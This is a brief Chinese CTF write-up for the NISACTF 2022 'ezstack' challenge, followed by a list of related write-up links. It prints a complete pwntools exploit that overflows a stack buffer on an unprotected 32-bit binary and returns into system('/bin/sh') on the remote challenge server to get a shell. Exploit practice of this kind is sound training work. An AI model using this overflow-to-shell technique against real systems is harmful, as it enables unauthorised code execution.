[NISACTF 2022]ezstack-入土为安的第十四天

简介: [NISACTF 2022]ezstack-入土为安的第十四天

签到题吧

checksec pwn  没有保护

进入main函数,点进shell ,buf 88808048buf

system 08048512

'/bin/sh 0804A024

直接让代码溢出调用system和/bin/sh

from pwn import *
# 连接到远程服务
p = remote('node5.anna.nssctf.cn', 20789)
# 构造 payload
payload = b'a' * (0x48 + 0x4) + p32(0x08048512) + p32(0x804A024)
# 发送 payload
p.sendlineafter('NISACTF', payload)
# 进入交互模式
p.interactive()

目录
相关文章
|
4月前
NSS [NISACTF 2022]popchains
NSS [NISACTF 2022]popchains
40 0
NSS [NISACTF 2022]popchains
|
4月前
[NISACTF 2022]bqt
[NISACTF 2022]bqt
38 0
|
4月前
[NISACTF 2022]huaji?
[NISACTF 2022]huaji?
54 0
|
4月前
NSS [NISACTF 2022]babyupload
NSS [NISACTF 2022]babyupload
47 0
|
4月前
|
Python
[NISACTF 2022]ezpython入土为安的第二十一天
[NISACTF 2022]ezpython入土为安的第二十一天
52 0
|
4月前
|
C语言
[NISACTF 2022]鸣神的国土
[NISACTF 2022]鸣神的国土
32 0
|
4月前
|
Shell
[NISACTF 2022]ezpie- 入土为安的第十五天
[NISACTF 2022]ezpie- 入土为安的第十五天
61 0
|
4月前
|
PHP
NSS [NISACTF 2022]level-up
NSS [NISACTF 2022]level-up
61 0
|
4月前
NSSCTF[NISACTF 2022]sign-ezc++
NSSCTF[NISACTF 2022]sign-ezc++
38 0
|
4月前
[NISACTF 2022]bilala的二维码
[NISACTF 2022]bilala的二维码
57 0